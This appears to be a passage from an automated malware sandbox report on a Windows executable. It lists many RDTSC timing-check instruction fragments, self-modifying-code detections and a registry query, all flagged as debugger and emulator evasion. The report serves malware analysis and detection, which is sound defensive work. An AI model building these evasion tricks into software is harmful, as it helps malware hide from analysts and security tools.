              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6D0E second address: 13C6D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6D14 second address: 13C6D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FEA188A9BDCh 0x0000000e jnl 00007FEA188A9BD6h 0x00000014 jmp 00007FEA188A9BE7h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C731C second address: 13C732D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C732D second address: 13C7343 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA188A9BDAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FEA188A9BD6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CF5A7 second address: 13CF5AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CF5AD second address: 13CF5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CF5B7 second address: 13CF5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFA68 second address: 13CFA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FEA188A9BE9h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFBDE second address: 13CFBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFBE2 second address: 13CFBF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEA188A9BDEh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFDC2 second address: 13CFDDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC1h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007FEA188F2DB6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFDDF second address: 13CFDE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFDE3 second address: 13CFE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEA188F2DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007FEA188F2DC5h 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jnc 00007FEA188F2DB6h 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFE14 second address: 13CFE3A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA188A9BEFh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7E20 second address: 13D7E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D80BB second address: 13D80CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FEA188A9BD6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8231 second address: 13D824B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA188F2DB6h 0x00000008 js 00007FEA188F2DB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007FEA188F2DB6h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D824B second address: 13D826D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEA188A9BD8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEA188A9BE4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D826D second address: 13D8271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D86C2 second address: 13D86D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA188A9BE1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8823 second address: 13D8837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FEA188F2DBBh 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8B00 second address: 13D8B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188A9BE5h 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8B1A second address: 13D8B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8B20 second address: 13D8B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7744 second address: 13D774A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D774A second address: 13D774E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D774E second address: 13D775A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FEA188F2DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D775A second address: 13D7764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEA188A9BD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7764 second address: 13D7768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF190 second address: 13DF1A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDDh 0x00000007 jc 00007FEA188A9BD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF438 second address: 13DF449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEA188F2DB6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF449 second address: 13DF46C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE2h 0x00000007 jmp 00007FEA188A9BDDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF46C second address: 13DF4AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FEA188F2DC8h 0x00000010 jmp 00007FEA188F2DC5h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF4AD second address: 13DF4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF4B1 second address: 13DF4B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF4B5 second address: 13DF4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF4BB second address: 13DF4C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007FEA188F2DB6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB53C second address: 13EB540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB540 second address: 13EB563 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FEA188F2DC3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FEA188F2DB6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB563 second address: 13EB56F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB56F second address: 13EB573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB573 second address: 13EB591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FEA188A9BD6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EAF1A second address: 13EAF72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188F2DC1h 0x00000008 jmp 00007FEA188F2DBAh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FEA188F2DBFh 0x0000001e popad 0x0000001f jne 00007FEA188F2DCEh 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EAF72 second address: 13EAF98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FEA188A9BE8h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007FEA188A9BD6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F15A0 second address: 13F15A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F15A4 second address: 13F15D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 jp 00007FEA188A9BDCh 0x00000016 jnp 00007FEA188A9BD6h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDA62 second address: 13FDA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FEA188F2DBAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FEA188F2DC1h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDA91 second address: 13FDAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FEA188A9BD6h 0x0000000c jne 00007FEA188A9BD6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1400580 second address: 14005BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC3h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jl 00007FEA188F2DB6h 0x00000011 jnp 00007FEA188F2DB6h 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FEA188F2DC3h 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14005BB second address: 14005E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDEh 0x00000007 jmp 00007FEA188A9BE5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14005E7 second address: 14005F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407582 second address: 1407586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407586 second address: 140758C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140DB7E second address: 140DBAC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FEA188A9BDBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FEA188A9BD8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop eax 0x00000019 popad 0x0000001a pushad 0x0000001b jl 00007FEA188A9BDAh 0x00000021 pushad 0x00000022 popad 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FDB1 second address: 141FDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FDB7 second address: 141FDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142C0D3 second address: 142C0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142C0D9 second address: 142C0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142C0DD second address: 142C0E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441C0B second address: 1441C17 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEA188A9BD6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441C17 second address: 1441C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FEA188F2DC9h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14424B9 second address: 14424DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FEA188A9BDCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14424DC second address: 14424EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007FEA188F2DB6h 0x0000000c jl 00007FEA188F2DB6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14426A3 second address: 14426A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14426A7 second address: 14426AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14427E0 second address: 14427F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 js 00007FEA188A9BD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14443D5 second address: 1444409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FEA188F2DBDh 0x0000000d pop eax 0x0000000e jmp 00007FEA188F2DC9h 0x00000013 popad 0x00000014 push esi 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445B13 second address: 1445B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445B17 second address: 1445B37 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188F2DBAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FEA188F2DBFh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445B37 second address: 1445B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jbe 00007FEA188A9BF1h 0x0000000e jmp 00007FEA188A9BE5h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144864D second address: 1448652 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144896F second address: 14489D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FEA188A9BD8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push dword ptr [ebp+122D2421h] 0x00000029 mov edx, dword ptr [ebp+122D224Ch] 0x0000002f call 00007FEA188A9BD9h 0x00000034 jno 00007FEA188A9BEEh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d je 00007FEA188A9BD8h 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14489D3 second address: 14489D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0293 second address: 4FC02E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FEA188A9BE7h 0x0000000c add ecx, 17063DFEh 0x00000012 jmp 00007FEA188A9BE9h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FEA188A9BDCh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC02E1 second address: 4FC032A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEA188F2DC1h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FEA188F2DC1h 0x0000000f adc si, 8196h 0x00000014 jmp 00007FEA188F2DC1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movsx edx, si 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC032A second address: 4FC034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 call 00007FEA188A9BDAh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEA188A9BDCh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0387 second address: 4FC03D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FEA188F2DBBh 0x00000012 pushfd 0x00000013 jmp 00007FEA188F2DC8h 0x00000018 or ax, D338h 0x0000001d jmp 00007FEA188F2DBBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC03D0 second address: 4FC0434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEA188A9BE1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 push edi 0x00000015 jmp 00007FEA188A9BE4h 0x0000001a pop eax 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FEA188A9BE3h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0434 second address: 4FC043A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC043A second address: 4FC0449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA188A9BDBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0449 second address: 4FC046F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC046F second address: 4FC0473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0473 second address: 4FC0479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362AEE second address: 1362AF7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362AF7 second address: 1362AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362EBD second address: 1362ECB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11AF965 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11AF892 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 135E954 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13E0D52 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
